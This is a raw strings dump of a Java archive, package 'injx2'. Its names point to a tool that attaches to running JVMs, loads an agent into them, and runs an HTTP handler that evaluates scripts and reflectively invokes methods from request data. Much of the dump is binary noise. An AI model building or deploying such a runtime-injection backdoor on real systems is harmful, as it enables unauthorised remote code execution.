000000009906 000000009906 0 (Ljava/io/Writer;)V 00000000991C 00000000991C 0 getContext 000000009929 000000009929 0 ()Ljavax/script/ScriptContext; 00000000994A 00000000994A 0 javax/script/ScriptContext 000000009966 000000009966 0 setWriter 000000009973 000000009973 0 setErrorWriter 00000000998A 00000000998A 0 &(Ljava/lang/String;)Ljava/lang/Object; 0000000099B4 0000000099B4 0 printStackTrace 0000000099C6 0000000099C6 0 (Ljava/io/PrintWriter;)V 0000000099E0 0000000099E0 0 getBuffer 0000000099ED 0000000099ED 0 ()Ljava/lang/StringBuffer; 000000009A0A 000000009A0A 0 java/lang/StringBuffer 000000009A23 000000009A23 0 toString 000000009A2E 000000009A2E 0 ()Ljava/lang/String; 000000009A45 000000009A45 0 getRequestMethod 000000009A58 000000009A58 0 getRequestURI 000000009A68 000000009A68 0 ()Ljava/net/URI; 000000009A7B 000000009A7B 0 java/net/URI 000000009A8A 000000009A8A 0 getPath 000000009A94 000000009A94 0 equals 000000009A9D 000000009A9D 0 (Ljava/lang/Object;)Z 000000009AB5 000000009AB5 0 injx2/Global 000000009AC4 000000009AC4 0 checklog 000000009ACF 000000009ACF 0 getRequestBody 000000009AE0 000000009AE0 0 ()Ljava/io/InputStream; 000000009AFA 000000009AFA 0 (Ljava/io/InputStream;)V 000000009B15 000000009B15 0 (Ljava/io/Reader;)V File pos Mem pos ID Text ======== ======= == ==== 000000009B2B 000000009B2B 0 readLine 000000009B36 000000009B36 0 append 000000009B3E 000000009B3E 0 -(Ljava/lang/String;)Ljava/lang/StringBuilder; 000000009B6F 000000009B6F 0 java/net/URLDecoder 000000009B85 000000009B85 0 decode 000000009B95 000000009B95 0 Ljava/io/BufferedWriter; 000000009BB0 000000009BB0 0 java/io/BufferedWriter 000000009BC9 000000009BC9 0 write 000000009BD1 000000009BD1 0 (Ljava/lang/String;)V 000000009BE9 000000009BE9 0 flush 000000009BF1 000000009BF1 0 compile 000000009BFA 000000009BFA 0 -(Ljava/lang/String;)Ljava/util/regex/Pattern; 000000009C2B 000000009C2B 0 matcher 000000009C34 000000009C34 0 3(Ljava/lang/CharSequence;)Ljava/util/regex/Matcher; 000000009C78 000000009C78 0 group 000000009C80 000000009C80 0 (I)Ljava/lang/String; 000000009C98 000000009C98 0 replaceAll 000000009CA4 000000009CA4 0 8(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String; 000000009CDF 000000009CDF 0 A(Linjx2/HTTPServ$MyHandler;Ljava/lang/String;Ljava/lang/String;)V 000000009D24 000000009D24 0 start 000000009D2C 000000009D2C 0 getQuery 000000009D37 000000009D37 0 split 000000009D3E 000000009D3E 0 '(Ljava/lang/String;)[Ljava/lang/String; 000000009D69 000000009D69 0 runningclass 000000009D78 000000009D78 0 Ljava/util/Map; 000000009D8A 000000009D8A 0 java/util/Map 000000009D9F 000000009D9F 0 &(Ljava/lang/Object;)Ljava/lang/Object; 000000009DC9 000000009DC9 0 getDeclaredMethods 000000009DDE 000000009DDE 0 ()[Ljava/lang/reflect/Method; 000000009DFE 000000009DFE 0 java/lang/reflect/Method 000000009E19 000000009E19 0 getParameterTypes 000000009E2D 000000009E2D 0 ()[Ljava/lang/Class; 000000009E44 000000009E44 0 getName 000000009E4E 000000009E4E 0 getBytes 000000009E5F 000000009E5F 0 javax/xml/bind/DatatypeConverter 000000009E83 000000009E83 0 printBase64Binary 000000009E97 000000009E97 0 ([B)Ljava/lang/String; 000000009EB0 000000009EB0 0 parseBase64Binary 000000009EC4 000000009EC4 0 (Ljava/lang/String;)[B 000000009EDD 000000009EDD 0 ([B)V 000000009EE4 000000009EE4 0 -(Ljava/lang/Object;)Ljava/lang/StringBuilder; 000000009F15 000000009F15 0 java/lang/Integer 000000009F29 000000009F29 0 parseInt 000000009F34 000000009F34 0 (Ljava/lang/String;)I 000000009F4C 000000009F4C 0 isArray 000000009F5D 000000009F5D 0 isAccessible 000000009F6C 000000009F6C 0 setAccessible 000000009F83 000000009F83 0 invoke 000000009F8B 000000009F8B 0 9(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object; 000000009FC8 000000009FC8 0 keySet 000000009FD1 000000009FD1 0 ()Ljava/util/Set; 000000009FE5 000000009FE5 0 java/util/Set 000000009FF5 000000009FF5 0 iterator 00000000A000 00000000A000 0 ()Ljava/util/Iterator; 00000000A019 00000000A019 0 hasNext 00000000A02A 00000000A02A 0 ()Ljava/lang/Object; 00000000A040 00000000A040 0 insertjar 00000000A04C 00000000A04C 0 loadClass 00000000A058 00000000A058 0 %(Ljava/lang/String;)Ljava/lang/Class; 00000000A081 00000000A081 0 newInstance File pos Mem pos ID Text ======== ======= == ==== 00000000A08F 00000000A08F 0 getMethods 00000000A09B 00000000A09B 0 substring 00000000A0A8 00000000A0A8 0 (II)Ljava/lang/String; 00000000A0C1 00000000A0C1 0 java/lang/System 00000000A0D4 00000000A0D4 0 getProperty 00000000A0E2 00000000A0E2 0 toLowerCase 00000000A0F0 00000000A0F0 0 contains 00000000A0FB 00000000A0FB 0 (Ljava/lang/CharSequence;)Z 00000000A119 00000000A119 0 getResponseHeaders 00000000A12D 00000000A12D 0 "()Lcom/sun/net/httpserver/Headers; 00000000A153 00000000A153 0 com/sun/net/httpserver/Headers 00000000A179 00000000A179 0 '(Ljava/lang/String;Ljava/lang/String;)V 00000000A1A4 00000000A1A4 0 length 00000000A1B3 00000000A1B3 0 sendResponseHeaders 00000000A1C9 00000000A1C9 0 (IJ)V 00000000A1D1 00000000A1D1 0 getResponseBody 00000000A1E3 00000000A1E3 0 ()Ljava/io/OutputStream; 00000000A1FE 00000000A1FE 0 java/io/OutputStream 00000000A215 00000000A215 0 close 00000000B710 00000000B710 0 injx2/HTTPServ.class 00000000B771 00000000B771 0 MyHandler 00000000B77E 00000000B77E 0 InnerClasses 00000000B78D 00000000B78D 0 <init> 00000000B7A3 00000000B7A3 0 LineNumberTable 00000000B7B5 00000000B7B5 0 LocalVariableTable 00000000B7D1 00000000B7D1 0 Linjx2/HTTPServ; 00000000B7F0 00000000B7F0 0 value 00000000B7FC 00000000B7FC 0 server 00000000B804 00000000B804 0 #Lcom/sun/net/httpserver/HttpServer; 00000000B82B 00000000B82B 0 Exceptions 00000000B83B 00000000B83B 0 SourceFile 00000000B848 00000000B848 0 HTTPServ.java 00000000B85D 00000000B85D 0 java/net/InetSocketAddress 00000000B898 00000000B898 0 injx2/HTTPServ$MyHandler 00000000B8CA 00000000B8CA 0 injx2/HTTPServ 00000000B8DB 00000000B8DB 0 java/lang/Object 00000000B8EE 00000000B8EE 0 java/io/IOException 00000000B904 00000000B904 0 java/lang/Integer 00000000B918 00000000B918 0 valueOf 00000000B922 00000000B922 0 (I)Ljava/lang/Integer; 00000000B93B 00000000B93B 0 intValue 00000000B94B 00000000B94B 0 !com/sun/net/httpserver/HttpServer 00000000B970 00000000B970 0 create 00000000B978 00000000B978 0 B(Ljava/net/InetSocketAddress;I)Lcom/sun/net/httpserver/HttpServer; 00000000B9BE 00000000B9BE 0 createContext 00000000B9CD 00000000B9CD 0 \(Ljava/lang/String;Lcom/sun/net/httpserver/HttpHandler;)Lcom/sun/net/httpserver/HttpContext; 00000000BA2D 00000000BA2D 0 java/util/concurrent/Executors 00000000BA4E 00000000BA4E 0 newCachedThreadPool 00000000BA63 00000000BA63 0 (()Ljava/util/concurrent/ExecutorService; 00000000BA8F 00000000BA8F 0 setExecutor 00000000BA9C 00000000BA9C 0 "(Ljava/util/concurrent/Executor;)V 00000000BAC2 00000000BAC2 0 start 00000000BBD5 00000000BBD5 0 injx2/INJX.class 00000000BDC0 00000000BDC0 0 Ljava/io/File; 00000000BDD1 00000000BDD1 0 <init> 00000000BDE7 00000000BDE7 0 LineNumberTable 00000000BDF9 00000000BDF9 0 LocalVariableTable 00000000BE15 00000000BE15 0 Linjx2/INJX; 00000000BE24 00000000BE24 0 getProcessNameFromPID 00000000BE3B 00000000BE3B 0 &(Ljava/lang/String;)Ljava/lang/String; File pos Mem pos ID Text ======== ======= == ==== 00000000BE69 00000000BE69 0 Ljava/io/IOException; 00000000BE85 00000000BE85 0 Ljava/lang/InterruptedException; 00000000BEAD 00000000BEAD 0 Ljava/lang/Process; 00000000BEC3 00000000BEC3 0 sbInput 00000000BECD 00000000BECD 0 Ljava/lang/StringBuffer; 00000000BEE8 00000000BEE8 0 brInput 00000000BEF2 00000000BEF2 0 Ljava/io/BufferedReader; 00000000BF14 00000000BF14 0 Ljava/lang/String; 00000000BF28 00000000BF28 0 foundLine 00000000BF35 00000000BF35 0 result 00000000BF43 00000000BF43 0 Ljava/io/FileNotFoundException; 00000000BF71 00000000BF71 0 Ljava/lang/StringBuilder; 00000000BF93 00000000BF93 0 StackMapTable 00000000BFBE 00000000BFBE 0 getpid 00000000BFCD 00000000BFCD 0 runtime 00000000BFD6 00000000BFD6 0 $Ljava/lang/management/RuntimeMXBean; 00000000C004 00000000C004 0 Ljava/lang/reflect/Field; 00000000C027 00000000C027 0 Lsun/management/VMManagement; 00000000C047 00000000C047 0 pid_method 00000000C054 00000000C054 0 Ljava/lang/reflect/Method; 00000000C070 00000000C070 0 Ljava/lang/NoSuchFieldException; 00000000C094 00000000C094 0 Ljava/lang/SecurityException; 00000000C0B3 00000000C0B3 0 $Ljava/lang/IllegalArgumentException; 00000000C0DA 00000000C0DA 0 "Ljava/lang/IllegalAccessException; 00000000C0FF 00000000C0FF 0 !Ljava/lang/NoSuchMethodException; 00000000C123 00000000C123 0 -Ljava/lang/reflect/InvocationTargetException; 00000000C16D 00000000C16D 0 ([Ljava/lang/String;)V 00000000C186 00000000C186 0 descriptor 00000000C192 00000000C192 0 /Lcom/sun/tools/attach/VirtualMachineDescriptor; 00000000C1CA 00000000C1CA 0 Ljava/util/Iterator; 00000000C1E1 00000000C1E1 0 descriptors 00000000C1EF 00000000C1EF 0 Ljava/util/List; 00000000C201 00000000C201 0 2Lcom/sun/tools/attach/AttachNotSupportedException; 00000000C236 00000000C236 0 )Lcom/sun/tools/attach/AgentLoadException; 00000000C262 00000000C262 0 3Lcom/sun/tools/attach/AgentInitializationException; 00000000C299 00000000C299 0 Ljava/net/URISyntaxException; 00000000C2BD 00000000C2BD 0 %Lcom/sun/tools/attach/VirtualMachine; 00000000C2ED 00000000C2ED 0 [Ljava/lang/String; 00000000C303 00000000C303 0 LocalVariableTypeTable 00000000C31B 00000000C31B 0 ALjava/util/List<Lcom/sun/tools/attach/VirtualMachineDescriptor;>; 00000000C385 00000000C385 0 SourceFile 00000000C391 00000000C391 0 INJX.java 00000000C3A8 00000000C3A8 0 os.name 00000000C3D5 00000000C3D5 0 tasklist 00000000C3E5 00000000C3E5 0 java/io/IOException 00000000C400 00000000C400 0 java/lang/StringBuffer 00000000C419 00000000C419 0 java/io/BufferedReader 00000000C432 00000000C432 0 java/io/InputStreamReader 00000000C460 00000000C460 0 UNKNOWN 00000000C46F 00000000C46F 0 java/lang/StringBuilder 00000000C49C 00000000C49C 0 injx2/INJX 00000000C4C8 00000000C4C8 0 java/lang/InterruptedException 00000000C4FC 00000000C4FC 0 java/io/File 00000000C50B 00000000C50B 0 /proc/ 00000000C514 00000000C514 0 /psline 00000000C528 00000000C528 0 /cmdline 00000000C533 00000000C533 0 java/io/FileReader 00000000C54D 00000000C54D 0 java/io/FileNotFoundException 00000000C577 00000000C577 0 Known 00000000C59E 00000000C59E 0 sun/management/VMManagement File pos Mem pos ID Text ======== ======= == ==== 00000000C5BC 00000000C5BC 0 getProcessId 00000000C5CB 00000000C5CB 0 java/lang/Class 00000000C5E5 00000000C5E5 0 java/lang/Object 00000000C5FD 00000000C5FD 0 java/lang/Integer 00000000C616 00000000C616 0 java/lang/NoSuchFieldException 00000000C637 00000000C637 0 java/lang/SecurityException 00000000C654 00000000C654 0 "java/lang/IllegalArgumentException 00000000C679 00000000C679 0 java/lang/IllegalAccessException 00000000C69D 00000000C69D 0 java/lang/NoSuchMethodException 00000000C6BE 00000000C6BE 0 +java/lang/reflect/InvocationTargetException 00000000C6F9 00000000C6F9 0 +----------------- JVMs:------------------- 00000000C744 00000000C744 0 -com/sun/tools/attach/VirtualMachineDescriptor 00000000C78F 00000000C78F 0 *----------------------------------------- 00000000C7CE 00000000C7CE 0 0com/sun/tools/attach/AttachNotSupportedException 00000000C812 00000000C812 0 Loading: 00000000C86F 00000000C86F 0 Liberdade e gl 00000000C883 00000000C883 0 Libertad y gloria 00000000C8C9 00000000C8C9 0 'com/sun/tools/attach/AgentLoadException 00000000C8F3 00000000C8F3 0 1com/sun/tools/attach/AgentInitializationException 00000000C928 00000000C928 0 java/net/URISyntaxException 00000000C94B 00000000C94B 0 java/lang/String 00000000C95E 00000000C95E 0 java/lang/Process 00000000C972 00000000C972 0 java/util/List 00000000C983 00000000C983 0 java/util/Iterator 00000000C997 00000000C997 0 #com/sun/tools/attach/VirtualMachine 00000000C9BE 00000000C9BE 0 java/lang/Throwable 00000000C9D4 00000000C9D4 0 java/lang/System 00000000C9E7 00000000C9E7 0 getProperty 00000000C9F5 00000000C9F5 0 toLowerCase 00000000CA03 00000000CA03 0 ()Ljava/lang/String; 00000000CA1A 00000000CA1A 0 contains 00000000CA25 00000000CA25 0 (Ljava/lang/CharSequence;)Z 00000000CA43 00000000CA43 0 java/lang/Runtime 00000000CA57 00000000CA57 0 getRuntime 00000000CA64 00000000CA64 0 ()Ljava/lang/Runtime; 00000000CA82 00000000CA82 0 '(Ljava/lang/String;)Ljava/lang/Process; 00000000CAAD 00000000CAAD 0 printStackTrace 00000000CABF 00000000CABF 0 getInputStream 00000000CAD0 00000000CAD0 0 ()Ljava/io/InputStream; 00000000CAEA 00000000CAEA 0 (Ljava/io/InputStream;)V 00000000CB05 00000000CB05 0 (Ljava/io/Reader;)V 00000000CB1B 00000000CB1B 0 readLine 00000000CB26 00000000CB26 0 append 00000000CB2E 00000000CB2E 0 -(Ljava/lang/String;)Ljava/lang/StringBuilder; 00000000CB5F 00000000CB5F 0 toString 00000000CB69 00000000CB69 0 ,(Ljava/lang/String;)Ljava/lang/StringBuffer; 00000000CB99 00000000CB99 0 getName 00000000CBA3 00000000CBA3 0 java/util/logging/Logger 00000000CBBD 00000000CBBD 0 getLogger 00000000CBC9 00000000CBC9 0 .(Ljava/lang/String;)Ljava/util/logging/Logger; 00000000CBFB 00000000CBFB 0 java/util/logging/Level 00000000CC15 00000000CC15 0 SEVERE 00000000CC1E 00000000CC1E 0 Ljava/util/logging/Level; 00000000CC3F 00000000CC3F 0 C(Ljava/util/logging/Level;Ljava/lang/String;Ljava/lang/Throwable;)V 00000000CC86 00000000CC86 0 waitFor 00000000CC90 00000000CC90 0 destroy 00000000CC9A 00000000CC9A 0 indexOf 00000000CCA4 00000000CCA4 0 (Ljava/lang/String;)I 00000000CCBB 00000000CCBB 0 substring 00000000CCC8 00000000CCC8 0 (II)Ljava/lang/String; File pos Mem pos ID Text ======== ======= == ==== 00000000CCE1 00000000CCE1 0 (Ljava/lang/String;)V 00000000CCF9 00000000CCF9 0 exists 00000000CD08 00000000CD08 0 (Ljava/io/File;)V 00000000CD1C 00000000CD1C 0 replaceAll 00000000CD28 00000000CD28 0 8(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String; 00000000CD63 00000000CD63 0 &java/lang/management/ManagementFactory 00000000CD8D 00000000CD8D 0 getRuntimeMXBean 00000000CD9F 00000000CD9F 0 &()Ljava/lang/management/RuntimeMXBean; 00000000CDC9 00000000CDC9 0 getClass 00000000CDD4 00000000CDD4 0 ()Ljava/lang/Class; 00000000CDEA 00000000CDEA 0 getDeclaredField 00000000CDFC 00000000CDFC 0 -(Ljava/lang/String;)Ljava/lang/reflect/Field; 00000000CE2D 00000000CE2D 0 java/lang/reflect/Field 00000000CE47 00000000CE47 0 setAccessible 00000000CE63 00000000CE63 0 &(Ljava/lang/Object;)Ljava/lang/Object; 00000000CE8D 00000000CE8D 0 getDeclaredMethod 00000000CEA0 00000000CEA0 0 @(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method; 00000000CEE4 00000000CEE4 0 java/lang/reflect/Method 00000000CEFF 00000000CEFF 0 invoke 00000000CF07 00000000CF07 0 9(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object; 00000000CF44 00000000CF44 0 intValue 00000000CF56 00000000CF56 0 ()Ljava/util/List; 00000000CF71 00000000CF71 0 Ljava/io/PrintStream; 00000000CF89 00000000CF89 0 java/io/PrintStream 00000000CF9F 00000000CF9F 0 println 00000000CFA9 00000000CFA9 0 iterator 00000000CFB4 00000000CFB4 0 ()Ljava/util/Iterator; 00000000CFCD 00000000CFCD 0 hasNext 00000000CFDE 00000000CFDE 0 ()Ljava/lang/Object; 00000000CFFA 00000000CFFA 0 displayName 00000000D008 00000000D008 0 matches 00000000D012 00000000D012 0 (Ljava/lang/String;)Z 00000000D02A 00000000D02A 0 attach 00000000D032 00000000D032 0 9(Ljava/lang/String;)Lcom/sun/tools/attach/VirtualMachine; 00000000D06F 00000000D06F 0 parseInt 00000000D07A 00000000D07A 0 getProtectionDomain 00000000D08F 00000000D08F 0 "()Ljava/security/ProtectionDomain; 00000000D0B5 00000000D0B5 0 java/security/ProtectionDomain 00000000D0D6 00000000D0D6 0 getCodeSource 00000000D0E6 00000000D0E6 0 ()Ljava/security/CodeSource; 00000000D105 00000000D105 0 java/security/CodeSource 00000000D120 00000000D120 0 getLocation 00000000D12E 00000000D12E 0 ()Ljava/net/URL; 00000000D141 00000000D141 0 java/net/URL 00000000D150 00000000D150 0 toURI 00000000D158 00000000D158 0 ()Ljava/net/URI; 00000000D16B 00000000D16B 0 java/net/URI 00000000D17A 00000000D17A 0 getPath 00000000D184 00000000D184 0 getAbsolutePath 00000000D195 00000000D195 0 loadAgent 00000000D1A1 00000000D1A1 0 '(Ljava/lang/String;Ljava/lang/String;)V 00000000D1CC 00000000D1CC 0 detach 00000000DD74 00000000DD74 0 injx2/ViewClassLoader.class 00000000DDFD 00000000DDFD 0 <init> 00000000DE13 00000000DE13 0 LineNumberTable 00000000DE25 00000000DE25 0 LocalVariableTable 00000000DE41 00000000DE41 0 Linjx2/ViewClassLoader; 00000000DE5A 00000000DE5A 0 loadClass 00000000DE66 00000000DE66 0 &(Ljava/lang/String;Z)Ljava/lang/Class; 00000000DEA0 00000000DEA0 0 Ljava/io/IOException; File pos Mem pos ID Text ======== ======= == ==== 00000000DEB8 00000000DEB8 0 filename 00000000DEC3 00000000DEC3 0 Ljava/lang/String; 00000000DED8 00000000DED8 0 Ljava/lang/Exception; 00000000DEF7 00000000DEF7 0 resolve 00000000DF09 00000000DF09 0 Ljava/lang/Class; 00000000DF1D 00000000DF1D 0 StackMapTable 00000000DF39 00000000DF39 0 Exceptions 00000000DF46 00000000DF46 0 loadClassData 00000000DF56 00000000DF56 0 (Ljava/lang/String;)[B 00000000DF6F 00000000DF6F 0 classbytes 00000000DF7C 00000000DF7C 0 SourceFile 00000000DF89 00000000DF89 0 ViewClassLoader.java 00000000DFAA 00000000DFAA 0 java/lang/StringBuilder 00000000DFD9 00000000DFD9 0 .class 00000000DFF0 00000000DFF0 0 java/lang/ClassNotFoundException 00000000E019 00000000E019 0 java/io/IOException 00000000E02F 00000000E02F 0 Error reading file: 00000000E04B 00000000E04B 0 java/lang/Exception 00000000E076 00000000E076 0 injx2/ViewClassLoader 00000000E08E 00000000E08E 0 java/lang/ClassLoader 00000000E0A6 00000000E0A6 0 java/lang/Class 00000000E0B8 00000000E0B8 0 java/lang/String 00000000E0CB 00000000E0CB 0 findLoadedClass 00000000E0DC 00000000E0DC 0 %(Ljava/lang/String;)Ljava/lang/Class; 00000000E105 00000000E105 0 java/io/File 00000000E114 00000000E114 0 separatorChar 00000000E128 00000000E128 0 replace 00000000E132 00000000E132 0 (CC)Ljava/lang/String; 00000000E14B 00000000E14B 0 append 00000000E153 00000000E153 0 -(Ljava/lang/String;)Ljava/lang/StringBuilder; 00000000E184 00000000E184 0 toString 00000000E18F 00000000E18F 0 ()Ljava/lang/String; 00000000E1A6 00000000E1A6 0 defineClass 00000000E1B3 00000000E1B3 0 )(Ljava/lang/String;[BII)Ljava/lang/Class; 00000000E1E0 00000000E1E0 0 (Ljava/lang/String;)V 00000000E1F8 00000000E1F8 0 findSystemClass 00000000E20A 00000000E20A 0 resolveClass 00000000E219 00000000E219 0 (Ljava/lang/Class;)V 00000000E230 00000000E230 0 injx2/Global 00000000E23F 00000000E23F 0 classmap 00000000E24A 00000000E24A 0 Ljava/util/Map; 00000000E25C 00000000E25C 0 java/util/Map 00000000E271 00000000E271 0 &(Ljava/lang/Object;)Ljava/lang/Object; 00000000E4FB 00000000E4FB 0 injx2/javassist/UT 00000000E515 00000000E515 0 #z\ux 00000000E545 00000000E545 0 injx2/javassist/bytecode/UT 00000000E568 00000000E568 0 #z\ux 00000000E598 00000000E598 0 com/UT 00000000E5A6 00000000E5A6 0 %z\ux 00000000E5D6 00000000E5D6 0 com/sun/UT 00000000E5E8 00000000E5E8 0 %z\ux 00000000E618 00000000E618 0 com/sun/tools/UT 00000000E630 00000000E630 0 %z\ux 00000000E660 00000000E660 0 com/sun/tools/attach/UT 00000000E67F 00000000E67F 0 %z\ux 00000000E6AF 00000000E6AF 0 com/sun/tools/attach/AttachPermission.classUT 00000000E6E4 00000000E6E4 0 %z\ux 00000000E704 00000000E704 0 A,bDc 00000000E93F 00000000E93F 0 com/sun/tools/attach/AttachNotSupportedException.classUT 00000000E97F 00000000E97F 0 %z\ux File pos Mem pos ID Text ======== ======= == ==== 00000000E9F5 00000000E9F5 0 ]34&J 00000000E9FE 00000000E9FE 0 I{#f1 00000000EACB 00000000EACB 0 com/sun/tools/attach/AgentLoadException.classUT 00000000EB02 00000000EB02 0 %z\ux 00000000EB7A 00000000EB7A 0 P*qSL 00000000EBBD 00000000EBBD 0 ,'~wun5 00000000EC49 00000000EC49 0 com/sun/tools/attach/AgentInitializationException.classUT 00000000EC8A 00000000EC8A 0 %z\ux 00000000ECAB 00000000ECAB 0 G PPp 00000000EDF8 00000000EDF8 0 K" c= 00000000EE29 00000000EE29 0 com/sun/tools/attach/spi/UT 00000000EE4C 00000000EE4C 0 %z\ux 00000000EE7C 00000000EE7C 0 sun/UT 00000000EE8A 00000000EE8A 0 %z\ux 00000000EEBA 00000000EEBA 0 sun/tools/UT 00000000EECE 00000000EECE 0 %z\ux 00000000EEFE 00000000EEFE 0 sun/jvmstat/UT 00000000EF14 00000000EF14 0 %z\ux 00000000EF44 00000000EF44 0 sun/tools/attach/UT 00000000EF5F 00000000EF5F 0 ?z\ux 00000000EF8F 00000000EF8F 0 sun/tools/attach/WindowsVirtualMachine.classUT 00000000EFC5 00000000EFC5 0 %z\ux 00000000EFF4 00000000EFF4 0 | (Bm 00000000F11C 00000000F11C 0 Q}Z<. 00000000F176 00000000F176 0 q4'A 00000000F17C 00000000F17C 0 FE*iY 00000000F1C1 00000000F1C1 0 fY&QP 00000000F219 00000000F219 0 TIoR; 00000000F2F9 00000000F2F9 0 U4"OE 00000000F302 00000000F302 0 ,v!_E 00000000F3B4 00000000F3B4 0 E.rhm 00000000F3E1 00000000F3E1 0 ;N$qo 00000000F555 00000000F555 0 'ihTWhh2Wh 00000000F5D9 00000000F5D9 0 sun/tools/attach/WindowsAttachProvider.classUT 00000000F60F 00000000F60F 0 %z\ux 00000000F64D 00000000F64D 0 YgfAl 00000000F717 00000000F717 0 PGLrS 00000000F76F 00000000F76F 0 6SR+r/9 00000000F9B9 00000000F9B9 0 w8<|/; 00000000FB78 00000000FB78 0 q+pv 00000000FBB7 00000000FBB7 0 Jy~R| 00000000FC8A 00000000FC8A 0 _u15p 00000000FCC0 00000000FCC0 0 uA!&q 00000000FD7F 00000000FD7F 0 sun/tools/attach/HotSpotVirtualMachine.classUT 00000000FDB5 00000000FDB5 0 %z\ux 00000000FF0B 00000000FF0B 0 v3Ivu 00000000FF82 00000000FF82 0 h [x\ 00000000FFB4 00000000FFB4 0 I'mCz~ 000000010026 000000010026 0 Rs);\ 00000001002F 00000001002F 0 ;55S@G 0000000100B8 0000000100B8 0 ,CMuX 000000010109 000000010109 0 GfY,N}he 00000001011D 00000001011D 0 }BMmg 0000000101A1 0000000101A1 0 S2ZdDd 0000000101B9 0000000101B9 0 +#.cH 00000001021B 00000001021B 0 a]8X> 00000001022A 00000001022A 0 ,o2PF 0000000102F3 0000000102F3 0 x5Tb1 0000000106E8 0000000106E8 0 sun/tools/attach/WindowsVirtualMachine$PipedInputStream.classUT 00000001072F 00000001072F 0 1z\ux File pos Mem pos ID Text ======== ======= == ==== 0000000108A9 0000000108A9 0 1JY9zQ! 0000000108DF 0000000108DF 0 hbFEyr 0000000109AE 0000000109AE 0 sun/jvmstat/monitor/UT 0000000109CC 0000000109CC 0 %z\ux 0000000109FC 0000000109FC 0 sun/jvmstat/perfdata/UT 000000010A1B 000000010A1B 0 %z\ux 000000010A4B 000000010A4B 0 sun/jvmstat/monitor/remote/UT 000000010A70 000000010A70 0 %z\ux 000000010AA0 000000010AA0 0 sun/jvmstat/perfdata/monitor/UT 000000010AC7 000000010AC7 0 %z\ux 000000010AF7 000000010AF7 0 sun/jvmstat/perfdata/monitor/protocol/UT 000000010B27 000000010B27 0 %z\ux 000000010B57 000000010B57 0 sun/jvmstat/perfdata/monitor/v2_0/UT 000000010B83 000000010B83 0 %z\ux 000000010BB3 000000010BB3 0 sun/jvmstat/perfdata/monitor/v2_0/PerfDataBuffer.classUT 000000010BF3 000000010BF3 0 %z\ux 000000010D28 000000010D28 0 +UlQq 000000010E56 000000010E56 0 A5sN5sr 000000010E8B 000000010E8B 0 &VA*u 000000010EE1 000000010EE1 0 uuCRk 000000010F07 000000010F07 0 7x}kZ= 000000010F30 000000010F30 0 jz%IVKC 000000010FD1 000000010FD1 0 THbj@ 000000011071 000000011071 0 Q<)Vr e 0000000110FE 0000000110FE 0 5\@QH 000000011136 000000011136 0 S]uu' 000000011158 000000011158 0 bw$LVq 00000001118D 00000001118D 0 75 zx 0000000111AE 0000000111AE 0 ?Eit6 0000000112A2 0000000112A2 0 1Lb( 0000000113AB 0000000113AB 0 _PHgN 0000000113D1 0000000113D1 0 Io8aIU 0000000113FE 0000000113FE 0 B0[d', 0000000115C1 0000000115C1 0 3t0t2 0000000119E8 0000000119E8 0 f%YTcN 0000000119FB 0000000119FB 0 /!l-/ 000000011B1A 000000011B1A 0 !;%=dy 000000011C1C 000000011C1C 0 oa{N!n 000000011D58 000000011D58 0 sun/jvmstat/perfdata/monitor/protocol/local/UT 000000011D8E 000000011D8E 0 %z\ux 000000011DBE 000000011DBE 0 META-INF/services/UT 000000011DDA 000000011DDA 0 %z\ux 000000011E0A 000000011E0A 0 META-INF/services/com.sun.tools.attach.spi.AttachProviderUT 000000011E4D 000000011E4D 0 %z\ux 000000011E7D 000000011E7D 0 4W.wr 000000011EC4 000000011EC4 0 Y2gj" 000000011FB7 000000011FB7 0 META-INF/services/com.sun.tools.internal.xjc.PluginUT 000000011FF4 000000011FF4 0 %z\ux 000000012092 000000012092 0 META-INF/services/com.sun.mirror.apt.AnnotationProcessorFactoryUT 0000000120DB 0000000120DB 0 %z\ux 0000000120ED 0000000120ED 0 com.sun.istack.internal.ws.AnnotationProcessorFactoryImpl 000000012132 000000012132 0 rzB#n 000000012145 000000012145 0 META-INF/services/com.sun.jdi.connect.spi.TransportServiceUT 000000012189 000000012189 0 %z\ux 0000000121A7 0000000121A7 0 B (hR 0000000122D5 0000000122D5 0 META-INF/services/com.sun.jdi.connect.ConnectorUT 00000001230E 00000001230E 0 %z\ux 000000012332 000000012332 0 !V(DSRED| 000000012351 000000012351 0 eO&pz2 00000001236A 00000001236A 0 p}uu} File pos Mem pos ID Text ======== ======= == ==== 0000000124AC 0000000124AC 0 injx2/javassist/NotFoundException.classUT 0000000124DD 0000000124DD 0 #z\ux 000000012569 000000012569 0 =IXn(K6 000000012601 000000012601 0 @SW<[ 000000012628 000000012628 0 "G3@71 000000012658 000000012658 0 6F<Dd 000000012680 000000012680 0 bNC7V7 000000012692 000000012692 0 injx2/javassist/JarClassPath.classUT 0000000126BE 0000000126BE 0 #z\ux 000000012877 000000012877 0 hrgcB 000000012929 000000012929 0 *.Im"Cv 000000012AA9 000000012AA9 0 'I+DT 000000012B85 000000012B85 0 0?y!T 000000012BB7 000000012BB7 0 injx2/javassist/DirClassPath.classUT 000000012BE3 000000012BE3 0 #z\ux 000000012C8D 000000012C8D 0 7:6t|+ 000000012EFD 000000012EFD 0 s\d62 000000012F2A 000000012F2A 0 2jw[E 000000012FD1 000000012FD1 0 /q<9] 000000013016 000000013016 0 injx2/javassist/CtPrimitiveType.classUT 000000013045 000000013045 0 #z\ux 00000001323A 00000001323A 0 "nL*]( 000000013289 000000013289 0 I)R]! 00000001328F 00000001328F 0 J5C3$ 000000013330 000000013330 0 injx2/javassist/CtMethod.classUT 000000013358 000000013358 0 #z\ux 00000001336B 00000001336B 0 X x\U 000000013449 000000013449 0 dV6Fe 000000013497 000000013497 0 5l;vZ 0000000134F4 0000000134F4 0 h2fwl 000000013550 000000013550 0 f)JgW 000000013613 000000013613 0 Y&7k, 000000013763 000000013763 0 xRf{0 0000000137B5 0000000137B5 0 y4F)CU 000000013923 000000013923 0 $YZjNis# 000000013C1D 000000013C1D 0 :Y=Lt 000000013DA4 000000013DA4 0 injx2/javassist/CtMember$Cache.classUT 000000013DD2 000000013DD2 0 #z\ux 000000013FA2 000000013FA2 0 L#ju_TP 00000001400F 00000001400F 0 up=TC 0000000140EF 0000000140EF 0 Ql'%[ 0000000140FE 0000000140FE 0 W[8>o 0000000142C5 0000000142C5 0 h$Lv+ 0000000142E9 0000000142E9 0 9/zU!'J 00000001437A 